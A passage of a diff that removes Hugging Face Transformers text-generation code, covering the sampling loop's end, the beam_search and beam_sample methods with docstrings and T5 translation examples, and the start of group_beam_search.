UserWarning, - ) - stopping_criteria = validate_stopping_criteria(stopping_criteria, max_length) - logits_warper = logits_warper if logits_warper is not None else LogitsProcessorList() - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - # init attention / hidden states / scores tuples - scores = () if (return_dict_in_generate and output_scores) else None - decoder_attentions = () if (return_dict_in_generate and output_attentions) else None - cross_attentions = () if (return_dict_in_generate and output_attentions) else None - decoder_hidden_states = () if (return_dict_in_generate and output_hidden_states) else None - - # if model is an encoder-decoder, retrieve encoder attention weights and hidden states - if return_dict_in_generate and self.config.is_encoder_decoder: - encoder_attentions = model_kwargs["encoder_outputs"].get("attentions") if output_attentions else None - encoder_hidden_states = ( - model_kwargs["encoder_outputs"].get("hidden_states") if output_hidden_states else None - ) - - # keep track of which sequences are already finished - unfinished_sequences = input_ids.new(input_ids.shape[0]).fill_(1) - cur_len = input_ids.shape[-1] - - this_peer_finished = False # used by synced_gpus only - # auto-regressive generation - while True: - - if synced_gpus: - # Under synced_gpus the 
`forward` call must continue until all gpus complete their sequence. - # The following logic allows an early break if all peers finished generating their sequence - this_peer_finished_flag = torch.tensor(0.0 if this_peer_finished else 1.0).to(input_ids.device) - # send 0.0 if we finished, 1.0 otherwise - dist.all_reduce(this_peer_finished_flag, op=dist.ReduceOp.SUM) - # did all peers finish? the reduced sum will be 0.0 then - if this_peer_finished_flag.item() == 0.0: - break - - # prepare model inputs - model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs) - - # forward pass to get next token - outputs = self( - **model_inputs, - return_dict=True, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - ) - - if synced_gpus and this_peer_finished: - cur_len = cur_len + 1 - continue # don't waste resources running the code we don't need - - next_token_logits = outputs.logits[:, -1, :] - - # pre-process distribution - next_token_scores = logits_processor(input_ids, next_token_logits) - next_token_scores = logits_warper(input_ids, next_token_scores) - - # Store scores, attentions and hidden_states when required - if return_dict_in_generate: - if output_scores: - scores += (next_token_scores,) - if output_attentions: - decoder_attentions += ( - (outputs.decoder_attentions,) if self.config.is_encoder_decoder else (outputs.attentions,) - ) - if self.config.is_encoder_decoder: - cross_attentions += (outputs.cross_attentions,) - - if output_hidden_states: - decoder_hidden_states += ( - (outputs.decoder_hidden_states,) - if self.config.is_encoder_decoder - else (outputs.hidden_states,) - ) - - # sample - probs = nn.functional.softmax(next_token_scores, dim=-1) - next_tokens = torch.multinomial(probs, num_samples=1).squeeze(1) - - # finished sentences should have their next token be a padding token - if eos_token_id is not None: - if pad_token_id is None: - raise ValueError("If `eos_token_id` is defined, make sure that `pad_token_id` is defined.") - next_tokens = next_tokens * unfinished_sequences + pad_token_id * (1 - unfinished_sequences) - - # update generated ids, model inputs, and length for next step - input_ids = torch.cat([input_ids, next_tokens[:, None]], dim=-1) - model_kwargs = self._update_model_kwargs_for_generation( - outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder - ) - cur_len = cur_len + 1 - - # if eos_token was found in one sentence, set sentence to finished - if eos_token_id is not None: - unfinished_sequences = unfinished_sequences.mul((next_tokens != eos_token_id).long()) - - # stop when each sentence is finished, or if we exceed the maximum length - if unfinished_sequences.max() == 0 or stopping_criteria(input_ids, scores): - if not synced_gpus: - break - else: - this_peer_finished = True - - if return_dict_in_generate: - if self.config.is_encoder_decoder: - return SampleEncoderDecoderOutput( - sequences=input_ids, - scores=scores, - encoder_attentions=encoder_attentions, - encoder_hidden_states=encoder_hidden_states, - decoder_attentions=decoder_attentions, - cross_attentions=cross_attentions, - decoder_hidden_states=decoder_hidden_states, - ) - else: - return SampleDecoderOnlyOutput( - sequences=input_ids, - scores=scores, - attentions=decoder_attentions, - hidden_states=decoder_hidden_states, - ) - else: - return input_ids - - def beam_search( - self, - input_ids: torch.LongTensor, - beam_scorer: BeamScorer, - logits_processor: Optional[LogitsProcessorList] = None, - stopping_criteria: 
Optional[StoppingCriteriaList] = None, - max_length: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - **model_kwargs, - ) -> Union[BeamSearchOutput, torch.LongTensor]: - r""" - Generates sequences of token ids for models with a language modeling head using **beam search decoding** and - can be used for text-decoder, text-to-text, speech-to-text, and vision-to-text models. - - Parameters: - - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - The sequence used as a prompt for the generation. - beam_scorer (`BeamScorer`): - An derived instance of [`BeamScorer`] that defines how beam hypotheses are constructed, stored and - sorted during generation. For more information, the documentation of [`BeamScorer`] should be read. - logits_processor (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsProcessor`] - used to modify the prediction scores of the language modeling head applied at each generation step. - stopping_criteria (`StoppingCriteriaList`, *optional*): - An instance of [`StoppingCriteriaList`]. List of instances of class derived from [`StoppingCriteria`] - used to tell if the generation loop should stop. - max_length (`int`, *optional*, defaults to 20): - **DEPRECATED**. Use `logits_processor` or `stopping_criteria` directly to cap the number of generated - tokens. The maximum length of the sequence to be generated. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - model_kwargs: - Additional model specific kwargs will be forwarded to the `forward` function of the model. If model is - an encoder-decoder model the kwargs should include `encoder_outputs`. - - Return: - [`generation_utilsBeamSearchDecoderOnlyOutput`], [`~generation_utils.BeamSearchEncoderDecoderOutput`] or - `torch.LongTensor`: A `torch.LongTensor` containing the generated tokens (default behaviour) or a - [`~generation_utils.BeamSearchDecoderOnlyOutput`] if `model.config.is_encoder_decoder=False` and - `return_dict_in_generate=True` or a [`~generation_utils.BeamSearchEncoderDecoderOutput`] if - `model.config.is_encoder_decoder=True`. - - - Examples: - - ```python - >>> from transformers import ( - ... AutoTokenizer, - ... AutoModelForSeq2SeqLM, - ... LogitsProcessorList, - ... MinLengthLogitsProcessor, - ... BeamSearchScorer, - ... 
) - >>> import torch - - >>> tokenizer = AutoTokenizer.from_pretrained("t5-base") - >>> model = AutoModelForSeq2SeqLM.from_pretrained("t5-base") - - >>> encoder_input_str = "translate English to German: How old are you?" - >>> encoder_input_ids = tokenizer(encoder_input_str, return_tensors="pt").input_ids - - - >>> # lets run beam search using 3 beams - >>> num_beams = 3 - >>> # define decoder start token ids - >>> input_ids = torch.ones((num_beams, 1), device=model.device, dtype=torch.long) - >>> input_ids = input_ids * model.config.decoder_start_token_id - - >>> # add encoder_outputs to model keyword arguments - >>> model_kwargs = { - ... "encoder_outputs": model.get_encoder()( - ... encoder_input_ids.repeat_interleave(num_beams, dim=0), return_dict=True - ... ) - ... } - - >>> # instantiate beam scorer - >>> beam_scorer = BeamSearchScorer( - ... batch_size=1, - ... num_beams=num_beams, - ... device=model.device, - ... ) - - >>> # instantiate logits processors - >>> logits_processor = LogitsProcessorList( - ... [ - ... MinLengthLogitsProcessor(5, eos_token_id=model.config.eos_token_id), - ... ] - ... ) - - >>> outputs = model.beam_search(input_ids, beam_scorer, logits_processor=logits_processor, **model_kwargs) - - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Wie alt bist du?'] - ```""" - # init values - logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList() - stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList() - if max_length is not None: - warnings.warn( - "`max_length` is deprecated in this function, use `stopping_criteria=StoppingCriteriaList(MaxLengthCriteria(max_length=max_length))` instead.", - UserWarning, - ) - stopping_criteria = validate_stopping_criteria(stopping_criteria, max_length) - if len(stopping_criteria) == 0: - warnings.warn("You don't have defined any stopping_criteria, this will likely loop forever", UserWarning) - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - batch_size = len(beam_scorer._beam_hyps) - num_beams = beam_scorer.num_beams - - batch_beam_size, cur_len = input_ids.shape - - if num_beams * batch_size != batch_beam_size: - raise ValueError( - f"Batch dimension of `input_ids` should be {num_beams * batch_size}, but is {batch_beam_size}." 
- ) - - # init attention / hidden states / scores tuples - scores = () if (return_dict_in_generate and output_scores) else None - beam_indices = ( - tuple(() for _ in range(batch_beam_size)) if (return_dict_in_generate and output_scores) else None - ) - decoder_attentions = () if (return_dict_in_generate and output_attentions) else None - cross_attentions = () if (return_dict_in_generate and output_attentions) else None - decoder_hidden_states = () if (return_dict_in_generate and output_hidden_states) else None - - # if model is an encoder-decoder, retrieve encoder attention weights and hidden states - if return_dict_in_generate and self.config.is_encoder_decoder: - encoder_attentions = model_kwargs["encoder_outputs"].get("attentions") if output_attentions else None - encoder_hidden_states = ( - model_kwargs["encoder_outputs"].get("hidden_states") if output_hidden_states else None - ) - - beam_scores = torch.zeros((batch_size, num_beams), dtype=torch.float, device=input_ids.device) - beam_scores[:, 1:] = -1e9 - beam_scores = beam_scores.view((batch_size * num_beams,)) - - this_peer_finished = False # used by synced_gpus only - while True: - - if synced_gpus: - # Under synced_gpus the `forward` call must continue until all gpus complete their sequence. - # The following logic allows an early break if all peers finished generating their sequence - this_peer_finished_flag = torch.tensor(0.0 if this_peer_finished else 1.0).to(input_ids.device) - # send 0.0 if we finished, 1.0 otherwise - dist.all_reduce(this_peer_finished_flag, op=dist.ReduceOp.SUM) - # did all peers finish? the reduced sum will be 0.0 then - if this_peer_finished_flag.item() == 0.0: - break - - model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs) - - outputs = self( - **model_inputs, - return_dict=True, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - ) - - if synced_gpus and this_peer_finished: - cur_len = cur_len + 1 - continue # don't waste resources running the code we don't need - - next_token_logits = outputs.logits[:, -1, :] - # hack: adjust tokens for Marian. For Marian we have to make sure that the `pad_token_id` - # cannot be generated both before and after the `nn.functional.log_softmax` operation. 
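The lines that follow are the core of the beam-search update: each beam's running log-probability is added to the next-token log-probabilities, the beam dimension is flattened so candidates from all beams of one input compete with each other, and the `2 * num_beams` best continuations are kept. A minimal, self-contained sketch of that bookkeeping (editorial illustration with made-up shapes and values, not part of the original file):

```python
import torch

batch_size, num_beams, vocab_size = 1, 3, 5
# fake next-token log-probabilities for each of the batch_size * num_beams beams
next_token_scores = torch.log_softmax(torch.randn(batch_size * num_beams, vocab_size), dim=-1)
# running scores: only the first beam is "live" at the first step (mirrors beam_scores[:, 1:] = -1e9)
beam_scores = torch.tensor([0.0, -1e9, -1e9])

# add each beam's running score to all of its candidate tokens
candidates = next_token_scores + beam_scores[:, None]
# flatten beams so top-k compares candidates across all beams of the same batch item
candidates = candidates.view(batch_size, num_beams * vocab_size)
top_scores, top_ids = torch.topk(candidates, 2 * num_beams, dim=1, largest=True, sorted=True)

next_indices = top_ids // vocab_size  # which beam each candidate extends
next_tokens = top_ids % vocab_size    # which token it appends
```

Keeping `2 * num_beams` candidates mirrors the real loop below: it leaves head-room so the beams can still be filled when some of the top candidates end in `eos_token_id` and finalize a hypothesis instead of extending one.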
- next_token_logits = self.adjust_logits_during_generation(next_token_logits, cur_len=cur_len) - next_token_scores = nn.functional.log_softmax( - next_token_logits, dim=-1 - ) # (batch_size * num_beams, vocab_size) - - #Normal execution - next_token_scores_processed = logits_processor(input_ids, next_token_scores) - next_token_scores = next_token_scores_processed + beam_scores[:, None].expand_as(next_token_scores) - - # Store scores, attentions and hidden_states when required - if return_dict_in_generate: - if output_scores: - scores += (next_token_scores_processed,) - if output_attentions: - decoder_attentions += ( - (outputs.decoder_attentions,) if self.config.is_encoder_decoder else (outputs.attentions,) - ) - if self.config.is_encoder_decoder: - cross_attentions += (outputs.cross_attentions,) - - if output_hidden_states: - decoder_hidden_states += ( - (outputs.decoder_hidden_states,) - if self.config.is_encoder_decoder - else (outputs.hidden_states,) - ) - - # reshape for beam search - vocab_size = next_token_scores.shape[-1] - next_token_scores = next_token_scores.view(batch_size, num_beams * vocab_size) - - next_token_scores, next_tokens = torch.topk( - next_token_scores, 2 * num_beams, dim=1, largest=True, sorted=True - ) - - next_indices = torch_int_div(next_tokens, vocab_size) - next_tokens = next_tokens % vocab_size - - # stateless - beam_outputs = beam_scorer.process( - input_ids, - next_token_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - ) - - beam_scores = beam_outputs["next_beam_scores"] - beam_next_tokens = beam_outputs["next_beam_tokens"] - beam_idx = beam_outputs["next_beam_indices"] - - input_ids = torch.cat([input_ids[beam_idx, :], beam_next_tokens.unsqueeze(-1)], dim=-1) - - model_kwargs = self._update_model_kwargs_for_generation( - outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder - ) - if model_kwargs["past"] is not None: - model_kwargs["past"] = self._reorder_cache(model_kwargs["past"], beam_idx) - - if return_dict_in_generate and output_scores: - beam_indices = tuple((beam_indices[beam_idx[i]] + (beam_idx[i],) for i in range(len(beam_indices)))) - - # increase cur_len - cur_len = cur_len + 1 - - if beam_scorer.is_done or stopping_criteria(input_ids, scores): - if not synced_gpus: - break - else: - this_peer_finished = True - - sequence_outputs = beam_scorer.finalize( - input_ids, - beam_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - max_length=stopping_criteria.max_length, - ) - - if return_dict_in_generate: - if not output_scores: - sequence_outputs["sequence_scores"] = None - else: - num_return_sequences = beam_scorer.num_beam_hyps_to_keep - # return only as many indices as sequences - beam_indices = tuple( - (beam_indices[i * num_beams : i * num_beams + num_return_sequences] for i in range(batch_size)) - ) - beam_indices = sum(beam_indices, ()) - - if self.config.is_encoder_decoder: - return BeamSearchEncoderDecoderOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - beam_indices=beam_indices, - encoder_attentions=encoder_attentions, - encoder_hidden_states=encoder_hidden_states, - decoder_attentions=decoder_attentions, - cross_attentions=cross_attentions, - decoder_hidden_states=decoder_hidden_states, - ) - else: - return BeamSearchDecoderOnlyOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, 
- beam_indices=beam_indices, - attentions=decoder_attentions, - hidden_states=decoder_hidden_states, - ) - else: - return sequence_outputs["sequences"] - - def beam_sample( - self, - input_ids: torch.LongTensor, - beam_scorer: BeamScorer, - logits_processor: Optional[LogitsProcessorList] = None, - stopping_criteria: Optional[StoppingCriteriaList] = None, - logits_warper: Optional[LogitsProcessorList] = None, - max_length: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - **model_kwargs, - ) -> Union[BeamSampleOutput, torch.LongTensor]: - r""" - Generates sequences of token ids for models with a language modeling head using **beam search multinomial - sampling** and can be used for text-decoder, text-to-text, speech-to-text, and vision-to-text models. - - Parameters: - - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - The sequence used as a prompt for the generation. - beam_scorer (`BeamScorer`): - A derived instance of [`BeamScorer`] that defines how beam hypotheses are constructed, stored and - sorted during generation. For more information, the documentation of [`BeamScorer`] should be read. - logits_processor (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsProcessor`] - used to modify the prediction scores of the language modeling head applied at each generation step. - stopping_criteria (`StoppingCriteriaList`, *optional*): - An instance of [`StoppingCriteriaList`]. List of instances of class derived from [`StoppingCriteria`] - used to tell if the generation loop should stop. - logits_warper (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsWarper`] used - to warp the prediction score distribution of the language modeling head applied before multinomial - sampling at each generation step. - max_length (`int`, *optional*, defaults to 20): - **DEPRECATED**. Use `logits_processor` or `stopping_criteria` directly to cap the number of generated - tokens. The maximum length of the sequence to be generated. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - model_kwargs: - Additional model specific kwargs will be forwarded to the `forward` function of the model. 
If model is - an encoder-decoder model the kwargs should include `encoder_outputs`. - - Return: - [`~generation_utils.BeamSampleDecoderOnlyOutput`], [`~generation_utils.BeamSampleEncoderDecoderOutput`] or - `torch.LongTensor`: A `torch.LongTensor` containing the generated tokens (default behaviour) or a - [`~generation_utils.BeamSampleDecoderOnlyOutput`] if `model.config.is_encoder_decoder=False` and - `return_dict_in_generate=True` or a [`~generation_utils.BeamSampleEncoderDecoderOutput`] if - `model.config.is_encoder_decoder=True`. - - Examples: - - ```python - >>> from transformers import ( - ... AutoTokenizer, - ... AutoModelForSeq2SeqLM, - ... LogitsProcessorList, - ... MinLengthLogitsProcessor, - ... TopKLogitsWarper, - ... TemperatureLogitsWarper, - ... BeamSearchScorer, - ... ) - >>> import torch - - >>> tokenizer = AutoTokenizer.from_pretrained("t5-base") - >>> model = AutoModelForSeq2SeqLM.from_pretrained("t5-base") - - >>> encoder_input_str = "translate English to German: How old are you?" - >>> encoder_input_ids = tokenizer(encoder_input_str, return_tensors="pt").input_ids - - >>> # lets run beam search using 3 beams - >>> num_beams = 3 - >>> # define decoder start token ids - >>> input_ids = torch.ones((num_beams, 1), device=model.device, dtype=torch.long) - >>> input_ids = input_ids * model.config.decoder_start_token_id - - >>> # add encoder_outputs to model keyword arguments - >>> model_kwargs = { - ... "encoder_outputs": model.get_encoder()( - ... encoder_input_ids.repeat_interleave(num_beams, dim=0), return_dict=True - ... ) - ... } - - >>> # instantiate beam scorer - >>> beam_scorer = BeamSearchScorer( - ... batch_size=1, - ... max_length=model.config.max_length, - ... num_beams=num_beams, - ... device=model.device, - ... ) - - >>> # instantiate logits processors - >>> logits_processor = LogitsProcessorList( - ... [MinLengthLogitsProcessor(5, eos_token_id=model.config.eos_token_id)] - ... ) - >>> # instantiate logits processors - >>> logits_warper = LogitsProcessorList( - ... [ - ... TopKLogitsWarper(50), - ... TemperatureLogitsWarper(0.7), - ... ] - ... ) - - >>> outputs = model.beam_sample( - ... input_ids, beam_scorer, logits_processor=logits_processor, logits_warper=logits_warper, **model_kwargs - ... 
) - - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Wie alt bist du?'] - ```""" - # init values - logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList() - stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList() - if max_length is not None: - warnings.warn( - "`max_length` is deprecated in this function, use `stopping_criteria=StoppingCriteriaList(MaxLengthCriteria(max_length=max_length))` instead.", - UserWarning, - ) - stopping_criteria = validate_stopping_criteria(stopping_criteria, max_length) - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - batch_size = len(beam_scorer._beam_hyps) - num_beams = beam_scorer.num_beams - - batch_beam_size, cur_len = input_ids.shape - - # init attention / hidden states / scores tuples - scores = () if (return_dict_in_generate and output_scores) else None - beam_indices = ( - tuple(() for _ in range(batch_beam_size)) if (return_dict_in_generate and output_scores) else None - ) - decoder_attentions = () if (return_dict_in_generate and output_attentions) else None - cross_attentions = () if (return_dict_in_generate and output_attentions) else None - decoder_hidden_states = () if (return_dict_in_generate and output_hidden_states) else None - - # if model is an encoder-decoder, retrieve encoder attention weights and hidden states - if return_dict_in_generate and self.config.is_encoder_decoder: - encoder_attentions = model_kwargs["encoder_outputs"].get("attentions") if output_attentions else None - encoder_hidden_states = ( - model_kwargs["encoder_outputs"].get("hidden_states") if output_hidden_states else None - ) - - beam_scores = torch.zeros((batch_size, num_beams), dtype=torch.float, device=input_ids.device) - beam_scores = beam_scores.view((batch_size * num_beams,)) - - this_peer_finished = False # used by synced_gpus only - while True: - - if synced_gpus: - # Under synced_gpus the `forward` call must continue until all gpus complete their sequence. - # The following logic allows an early break if all peers finished generating their sequence - this_peer_finished_flag = torch.tensor(0.0 if this_peer_finished else 1.0).to(input_ids.device) - # send 0.0 if we finished, 1.0 otherwise - dist.all_reduce(this_peer_finished_flag, op=dist.ReduceOp.SUM) - # did all peers finish? the reduced sum will be 0.0 then - if this_peer_finished_flag.item() == 0.0: - break - - model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs) - - outputs = self( - **model_inputs, - return_dict=True, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - ) - - if synced_gpus and this_peer_finished: - cur_len = cur_len + 1 - continue # don't waste resources running the code we don't need - - next_token_logits = outputs.logits[:, -1, :] - - # hack: adjust tokens for Marian. 
For Marian we have to make sure that the `pad_token_id` - # cannot be generated both before and after the `nn.functional.log_softmax` operation. - next_token_logits = self.adjust_logits_during_generation(next_token_logits, cur_len=cur_len) - next_token_scores = nn.functional.log_softmax( - next_token_logits, dim=-1 - ) # (batch_size * num_beams, vocab_size) - - next_token_scores_processed = logits_processor(input_ids, next_token_scores) - next_token_scores = next_token_scores_processed + beam_scores[:, None].expand_as(next_token_scores) - next_token_scores = logits_warper(input_ids, next_token_scores) - - # Store scores, attentions and hidden_states when required - if return_dict_in_generate: - if output_scores: - scores += (logits_warper(input_ids, next_token_scores_processed),) - if output_attentions: - decoder_attentions += ( - (outputs.decoder_attentions,) if self.config.is_encoder_decoder else (outputs.attentions,) - ) - if self.config.is_encoder_decoder: - cross_attentions += (outputs.cross_attentions,) - - if output_hidden_states: - decoder_hidden_states += ( - (outputs.decoder_hidden_states,) - if self.config.is_encoder_decoder - else (outputs.hidden_states,) - ) - - # reshape for beam search - vocab_size = next_token_scores.shape[-1] - next_token_scores = next_token_scores.view(batch_size, num_beams * vocab_size) - - probs = nn.functional.softmax(next_token_scores, dim=-1) - - next_tokens = torch.multinomial(probs, num_samples=2 * num_beams) - next_token_scores = torch.gather(next_token_scores, -1, next_tokens) - - next_token_scores, _indices = torch.sort(next_token_scores, descending=True, dim=1) - next_tokens = torch.gather(next_tokens, -1, _indices) - - next_indices = torch_int_div(next_tokens, vocab_size) - next_tokens = next_tokens % vocab_size - - # stateless - beam_outputs = beam_scorer.process( - input_ids, - next_token_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - ) - beam_scores = beam_outputs["next_beam_scores"] - beam_next_tokens = beam_outputs["next_beam_tokens"] - beam_idx = beam_outputs["next_beam_indices"] - - input_ids = torch.cat([input_ids[beam_idx, :], beam_next_tokens.unsqueeze(-1)], dim=-1) - - model_kwargs = self._update_model_kwargs_for_generation( - outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder - ) - if model_kwargs["past"] is not None: - model_kwargs["past"] = self._reorder_cache(model_kwargs["past"], beam_idx) - - if return_dict_in_generate and output_scores: - beam_indices = tuple((beam_indices[beam_idx[i]] + (beam_idx[i],) for i in range(len(beam_indices)))) - - # increase cur_len - cur_len = cur_len + 1 - - if beam_scorer.is_done or stopping_criteria(input_ids, scores): - if not synced_gpus: - break - else: - this_peer_finished = True - - sequence_outputs = beam_scorer.finalize( - input_ids, - beam_scores, - next_tokens, - next_indices, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - max_length=stopping_criteria.max_length, - ) - - if return_dict_in_generate: - if not output_scores: - sequence_outputs["sequence_scores"] = None - else: - num_return_sequences = beam_scorer.num_beam_hyps_to_keep - # return only as many indices as sequences - beam_indices = tuple( - (beam_indices[i * num_beams : i * num_beams + num_return_sequences] for i in range(batch_size)) - ) - beam_indices = sum(beam_indices, ()) - - if self.config.is_encoder_decoder: - return BeamSampleEncoderDecoderOutput( - sequences=sequence_outputs["sequences"], - 
sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - beam_indices=beam_indices, - encoder_attentions=encoder_attentions, - encoder_hidden_states=encoder_hidden_states, - decoder_attentions=decoder_attentions, - cross_attentions=cross_attentions, - decoder_hidden_states=decoder_hidden_states, - ) - else: - return BeamSampleDecoderOnlyOutput( - sequences=sequence_outputs["sequences"], - sequences_scores=sequence_outputs["sequence_scores"], - scores=scores, - beam_indices=beam_indices, - attentions=decoder_attentions, - hidden_states=decoder_hidden_states, - ) - else: - return sequence_outputs["sequences"] - - def group_beam_search( - self, - input_ids: torch.LongTensor, - beam_scorer: BeamScorer, - logits_processor: Optional[LogitsProcessorList] = None, - stopping_criteria: Optional[StoppingCriteriaList] = None, - max_length: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - **model_kwargs, - ): - r""" - Generates sequences of token ids for models with a language modeling head using **diverse beam search - decoding** and can be used for text-decoder, text-to-text, speech-to-text, and vision-to-text models. - - Parameters: - - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - The sequence used as a prompt for the generation. - beam_scorer (`BeamScorer`): - An derived instance of [`BeamScorer`] that defines how beam hypotheses are constructed, stored and - sorted during generation. For more information, the documentation of [`BeamScorer`] should be read. - logits_processor (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsProcessor`] - used to modify the prediction scores of the language modeling head applied at each generation step. - stopping_criteria (`StoppingCriteriaList`, *optional*): - An instance of [`StoppingCriteriaList`]. List of instances of class derived from [`StoppingCriteria`] - used to tell if the generation loop should stop. - max_length (`int`, *optional*, defaults to 20): - **DEPRECATED**. Use `logits_processor` or `stopping_criteria` directly to cap the number of generated - tokens. The maximum length of the sequence to be generated. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. 
- synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - - model_kwargs: - Additional model specific kwargs that will be forwarded to the `forward` function of the model. If - model is an encoder-decoder model the kwargs should include `encoder_outputs`. - - Return: - [`~generation_utils.BeamSearchDecoderOnlyOutput`], [`~generation_utils.BeamSearchEncoderDecoderOutput`] or - `torch.LongTensor`: A `torch.LongTensor` containing the generated tokens (default behaviour) or a - [`~generation_utils.BeamSearchDecoderOnlyOutput`] if [`~generation_utils.BeamSearchDecoderOnlyOutput`] if - `model.config.is_encoder_decoder=False` and `return_dict_in_generate=True` or a - [`~generation_utils.BeamSearchEncoderDecoderOutput`] if `model.config.is_encoder_decoder=True`. - - Examples: - - ```python - >>> from transformers import ( - ... AutoTokenizer, - ... AutoModelForSeq2SeqLM, - ... LogitsProcessorList, - ... MinLengthLogitsProcessor, - ... HammingDiversityLogitsProcessor, - ... BeamSearchScorer, - ... ) - >>> import torch - - >>> tokenizer = AutoTokenizer.from_pretrained("t5-base") - >>> model = AutoModelForSeq2SeqLM.from_pretrained("t5-base") - - >>> encoder_input_str = "translate English to German: How old are you?" - >>> encoder_input_ids = tokenizer(encoder_input_str, return_tensors="pt").input_ids - - - >>> # lets run diverse beam search using 6 beams - >>> num_beams = 6 - >>> # 